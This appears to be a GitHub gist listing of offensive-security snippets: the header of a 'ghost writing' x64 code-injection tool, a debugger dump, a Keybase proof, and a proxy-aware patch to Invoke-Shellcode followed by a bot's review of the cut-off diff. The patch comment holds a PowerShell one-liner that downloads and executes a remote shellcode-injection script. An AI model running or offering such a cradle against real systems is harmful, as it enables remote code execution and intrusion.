@hatRiot
hatRiot / ghostwrite.cpp
Created August 22, 2019 04:55
ghostwrite x64
/*
simple x64 implementation of the ghost writing code injection technique. note this is JUST FOR REFERENCE and won't
work in your sweet new c2 off the shelf. it also uses capstone. check out pinjectra for a more feature rich and stable version of this.
*/
#include "stdafx.h"
#include <Windows.h>
#include "include/capstone/capstone.h"
#pragma comment(lib, "capstone.lib")

0:023:x86> dt _IMAGE_IMPORT_DESCRIPTOR 0x40000+0x91d0+0n40
ole32!_IMAGE_IMPORT_DESCRIPTOR
+0x000 Characteristics : 0x9290
+0x000 OriginalFirstThunk : 0x9290
+0x004 TimeDateStamp : 0
+0x008 ForwarderChain : 0
+0x00c Name : 0x99be
+0x010 FirstThunk : 0x900c
0:023:x86> da 0x40000+0x99be
000499be "KERNEL32.dll"

Keybase proof

I hereby claim:

  • I am hatRiot on github.
  • I am droner (https://keybase.io/droner) on keybase.
  • I have a public key whose fingerprint is B6F4 7EF5 4F44 CC36 1731 60E1 13A4 51C8 439D 800A

To claim this, I am signing this object:

@hatRiot
hatRiot / Invoke-Shellcode-Proxy
Last active May 7, 2016 16:58
Invoke-Shellcode proxy-aware
# apply to Invoke-Shellcode.ps1
# invoke with:
# PS > $wc = New-Object Net.WebClient ; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials ; iex $wc.DownloadString("http://host/Invoke-Shellcode.ps1")
596,599c596
<
< $proxy = [System.Net.WebRequest]::GetSystemWebProxy()
< $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
<
---
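Review bot: the hunk is cut off after the `---` separator, so the `>` side (the single line 596 of the right-hand file that replaces lines 596-599) is not visible and the replacement cannot be checked; the gist should carry the full hunk. The header comment should also state the direction of the diff: with `596,599c596` the `<` side is the one carrying `$proxy = [System.Net.WebRequest]::GetSystemWebProxy()` and `$proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials`, so a reader applying this to Invoke-Shellcode.ps1 needs to know whether those lines are being added or removed. Note as well that the one-liner in the header (`$wc.Proxy.Credentials = $wc.Credentials`) only makes the download of the script itself proxy-aware; it is these in-script lines that affect what the script does afterwards.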